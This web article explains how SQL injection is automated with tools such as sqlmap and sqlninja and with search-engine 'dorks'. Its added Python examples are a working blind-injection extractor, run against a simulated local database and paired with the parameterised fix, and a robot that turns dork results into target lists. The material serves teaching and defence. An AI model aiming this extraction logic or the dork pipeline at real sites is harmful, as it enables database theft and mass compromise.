SQL Injection through Automation with Tools and Search Engines

25 April 2011

SQL Injection through Automation with Tools

Tools are mainly used to automate two tasks within the SQL injection attack process: constructing a working exploit and extracting information. Having automated tools at hand not only dramatically increases the efficiency of an experienced attacker but also extends the potential attacker population. Tools equipped with a crisp and appealing GUI allow inexperienced "script kiddies" to mount complex SQL injection attacks against targets that previously required in-depth knowledge of hacking techniques (e.g. blind SQL injection) and familiarity with the backend database vendor's technology (the structure of its data dictionary, its SQL dialect, and so on). The overall effect of automation becomes clear when looking at the reported SQL injection incidents.

With the daunting, time-consuming task of creating a working exploit taken care of by automated tools, the time frame between target discovery and full exploitation shrinks dramatically. This has two favorable effects for potential attackers. First and foremost, the risk of detection is lower, because the attack is shorter; this is as true of real-life heists as of cyberspace ones. Secondly, it is much easier for attackers to find a window of opportunity in which to launch their attack, even against systems that are carefully watched and not always reachable for remote exploitation.

Not all tools are created alike. Some target a specific database vendor; some perform only a single task while others are more comprehensive. Some are command-line tools while others have a lavish GUI. Generally speaking, there are now tools that provide the following capabilities:

» Given an injection point (URL and parameters), create a working exploit.
» Achieve the above even when blind SQL injection is required (the page returns no query output, only a difference in behaviour).
» Identify the type of backend database.
» Extract metadata from the backend database (lists of tables, columns and users).
» Extract information through a GUI.
» Extract information through binary search (each yes/no answer from the application halves the range a value can lie in, so a byte costs about eight requests instead of up to 256).
» Compromise the remote server by deploying backdoors.

These are some of the tools employed by attackers to automate SQL injection attacks:

» Priamos can be used to find vulnerabilities in applications. The tool requires manual configuration of the injection point, but thereafter the user can supply the vulnerable parameter string to the injector module in Priamos to retrieve all database names, tables and column data. It presents a GUI to the user for direct database interaction.

» Power Injector does some automatic detection of the injection point and provides a GUI to take the SQL injection attack further from that point and extract the desired information from the database. Its power lies in its capacity to automate tedious blindfolded (blind) SQL injection methods using several threads in parallel.

» SQL Ninja (sqlninja) can be used to exploit SQL injection vulnerabilities in a Web application that uses Microsoft SQL Server as its back-end database. It requires manual configuration of the injection point. It is dedicated to exploiting injections through a specific extended stored procedure of the database server, xp_cmdshell, which lets the attacker run operating-system commands on the database host.

» SQL Map (sqlmap) does some of its automated detection of injection points based on Google searches, taking the search results as its target list. It performs automatic blind SQL injection, is capable of fingerprinting the active database management system, enumerating entire remote databases and much more.

These are just a few of the more common and publicized tools; many more have been, and continue to be, developed by professional attackers for the purpose of automating SQL injection attacks. An attacker with the appropriate toolbox and an idea of the potential injection points in an application needs no more than point and click to get away with credit card numbers, social security numbers and other personal information stored in a backend database.
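The two capabilities that make these tools worth automating, blind injection and extraction by binary search (listed above, and the "blindfolded" method that Power Injector and sqlmap automate), can be seen end to end in a small simulation. This is an added example written for this page, not code from any of the tools named or from the original article. The vulnerable page, the in-memory SQLite backend and its rows are constructed for the example, and every function name (vulnerable_page, hardened_page, oracle, extract_int, extract_string, fingerprint, dump_demo) is invented here.

```python
import sqlite3

# Constructed stand-in for the application's backend: an in-memory SQLite
# database with invented rows. Nothing here comes from a real system.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, secret TEXT)")
conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cr3t!')")
conn.commit()

REQUESTS = {"count": 0}  # page requests issued by the simulated tool


def vulnerable_page(product_id):
    """Hypothetical 'product.asp?id=' handler that concatenates the parameter into
    its query. It reveals only whether a row came back, which is all a blind
    injection needs; database errors are swallowed, as a production page would."""
    REQUESTS["count"] += 1
    sql = "SELECT name FROM products WHERE id = " + product_id
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def hardened_page(product_id):
    """The same handler with the fix: check the type and bind the value as a
    parameter, so the payload can never become part of the SQL statement."""
    try:
        row = conn.execute("SELECT name FROM products WHERE id = ?",
                           (int(product_id),)).fetchone()
    except (ValueError, sqlite3.Error):
        return False
    return row is not None


def oracle(condition, page=vulnerable_page):
    """Ask the application one yes/no question, appended to an id known to exist."""
    return page(f"1 AND ({condition})")


def extract_int(expr, hi=255, page=vulnerable_page):
    """Binary search for the value of an integer SQL expression in [0, hi]:
    log2(hi + 1) requests instead of up to hi + 1 with a linear scan."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}", page):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(expr, page=vulnerable_page):
    """Recover a string-valued SQL expression: first its length (8 requests), then
    each character's code point by binary search (7 requests per ASCII character)."""
    length = extract_int(f"length(({expr}))", 255, page)
    return "".join(
        chr(extract_int(f"unicode(substr(({expr}),{pos},1))", 127, page))
        for pos in range(1, length + 1)
    )


def fingerprint():
    """Identify the backend type: a function only SQLite defines answers yes."""
    return "SQLite" if oracle("sqlite_version() IS NOT NULL") else "unknown"


def dump_demo():
    """Walk the capability list: fingerprint the backend, enumerate its tables
    (metadata), then pull a secret. Returns the findings and the request count."""
    REQUESTS["count"] = 0
    backend = fingerprint()
    table_count = extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'")
    tables = [
        extract_string("SELECT name FROM sqlite_master WHERE type='table' "
                       f"ORDER BY name LIMIT 1 OFFSET {i}")
        for i in range(table_count)
    ]
    secret = extract_string("SELECT secret FROM users WHERE login='admin'")
    return backend, tables, secret, REQUESTS["count"]


if __name__ == "__main__":
    print(dump_demo())
    print(repr(extract_string("SELECT secret FROM users WHERE login='admin'", hardened_page)))
```

The request count returned by dump_demo is the point of the exercise: 173 true/false requests recover the backend type, both table names and a seven-character secret, and the multi-threading the tools above advertise only makes that faster. Against hardened_page every question is answered "no", so the same extraction returns an empty string; the fix is type validation plus parameter binding, not filtering of the payload.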



SQL Injection through Automation with Search Engines

While tools mostly serve to reduce the time from vulnerability detection to exploitation, another type of automation is required for quickly detecting large numbers of potential targets. The growing trend is the increasing abuse of Internet search engines to spot potential SQL injection targets.

Using specially crafted search terms, an attacker can quickly obtain a list of applications, accessible through the Internet, that are potentially vulnerable to a specific instance of SQL injection. Search terms can be crafted to detect a specific vulnerable application (e.g. one identified as vulnerable by a CVE entry) or a specific error message indicative of an SQL injection vulnerability (a database error that the application echoes into its pages and that the search engine has indexed). The results include not only the domain name of the target application but the actual injection points within it: the vulnerable page and its parameters. Thus, an attack can be mounted quickly by taking the information from the search engine results and feeding it to one of the automated tools mentioned above.

Attackers can craft their own search terms, but can also use resources available on the Internet that provide lists of search terms for almost any type of attack, SQL injection included. One of the most famous resources in this respect is Johnny Long's Google Hacking Database, maintained at johnny.ihackstuff.com. The search terms in Johnny's database, called "Google Dorks", are categorized by attack type, and the interface to the database is very intuitive.

Further increasing the effect of the Google Hacking technique on the overall efficiency of an attack is the use of automated search tools. These simple robots take a list of search terms as input, run them all at once and return a formatted set of results. Attackers can write their own tools (creating such a tool is a really simple programming exercise) or use tools available on the Internet such as Goolag Scanner (by the Cult of the Dead Cow). This tool in particular takes its list of search terms from Johnny Long's database and makes them available to the non-technical user through a pleasant, easy-to-use GUI.

Earlier this year, attackers used search engines to quickly find ASP and ASPX (.NET) pages that accepted a set of carefully chosen input parameters (e.g. an article ID, a product ID and others), which they suspected were indicative of a number of poorly written modules in use worldwide (most probably code samples widely copied by programmers). These parameters served as the injection points for the successful insertion, via SQL injection, of malicious code into over 500,000 Web pages. The injected code caused users who visited an affected site to be redirected to a malware-serving site. Affected companies were forced to investigate quickly and sanitize their Web sites by removing the injected code.
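The "simple robot" described above, together with the step that turns search results into a target list of injection points for ASP/ASPX pages of the kind abused in the incident just described, as an added example written for this page (it is not Goolag Scanner's code, nor code from the original article). The search terms, result URLs and hosts are constructed for the example and the search engine is replaced by an in-memory table so the script runs offline; the function names (search, injection_points, run_dorks, format_targets) are invented here.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed search terms in the style of the GHDB categories. They are
# illustrative examples written for this page, not entries copied from the GHDB.
DORKS = {
    "vulnerable_files": [
        'inurl:"article.asp?id="',
        'inurl:"product.aspx?productid="',
    ],
    "error_messages": [
        'intext:"Unclosed quotation mark after the character string"',
    ],
}

# Constructed stand-in for the search engine so the example runs offline: every
# host below is invented. A real robot would send each term over HTTP and parse
# the result page instead of reading this table.
FAKE_RESULTS = {
    'inurl:"article.asp?id="': [
        "http://news.example.com/article.asp?id=42",
        "http://news.example.com/article.asp?id=43&lang=en",
        "http://shop.example.net/article.asp?id=abc",
    ],
    'inurl:"product.aspx?productid="': [
        "http://shop.example.net/product.aspx?productid=7",
        "http://shop.example.net/product.aspx?productid=7",  # duplicate hit
    ],
    'intext:"Unclosed quotation mark after the character string"': [
        "http://legacy.example.org/search.asp?q=test",
    ],
}

NUMERIC = re.compile(r"^\d+$")


def search(term):
    """Return the result URLs for one search term (offline stand-in)."""
    return FAKE_RESULTS.get(term, [])


def injection_points(url, require_numeric=True):
    """Turn one result URL into candidate injection points (page, parameter, value).

    Only ASP/ASPX pages are kept, matching the attack described above. By default
    only parameters carrying a bare integer (article ID, product ID, ...) count,
    since those are the ones typically concatenated into a WHERE clause unquoted.
    A hit on a database error message already proves the page leaks SQL errors,
    so every parameter on it is worth trying (require_numeric=False).
    """
    parts = urlsplit(url)
    if not parts.path.lower().endswith((".asp", ".aspx")):
        return []
    page = "%s://%s%s" % (parts.scheme, parts.netloc, parts.path)
    points = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if require_numeric and not NUMERIC.match(value):
            continue
        points.append((page, name, value))
    return points


def run_dorks(dorks):
    """Run every term in every category and return {host: [(page, param, value,
    category)]}, deduplicated and sorted: the target list a tool would consume."""
    targets = {}
    for category, terms in dorks.items():
        numeric_only = category != "error_messages"
        for term in terms:
            for url in search(term):
                for page, name, value in injection_points(url, numeric_only):
                    host = urlsplit(page).netloc
                    targets.setdefault(host, set()).add((page, name, value, category))
    return {host: sorted(points) for host, points in sorted(targets.items())}


def format_targets(targets):
    """One line per injection point, ready to paste into a tool's target list."""
    lines = []
    for host, points in targets.items():
        for page, name, value, category in points:
            lines.append("%s\t%s?%s=%s\t%s" % (host, page, name, value, category))
    return lines


if __name__ == "__main__":
    print("\n".join(format_targets(run_dorks(DORKS))))
```

The same script is useful on the defending side: run the terms with a site: restriction on your own domain and you see exactly what an attacker's robot would be handed. The error-message class of search term only works because the application echoes database errors into pages that the search engine indexed; returning a generic error page removes that signal, though not the underlying injection.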



Source: Jasa Pembuatan Website, Siakad, Simpeg dan SIM Rumah Sakit (website, academic, personnel and hospital information system development services) https://klatenweb.com
Full article: https://klatenweb.com/artikel/517/SQL-Injection-through-Automation-with-Tools-and-Search-Engines.html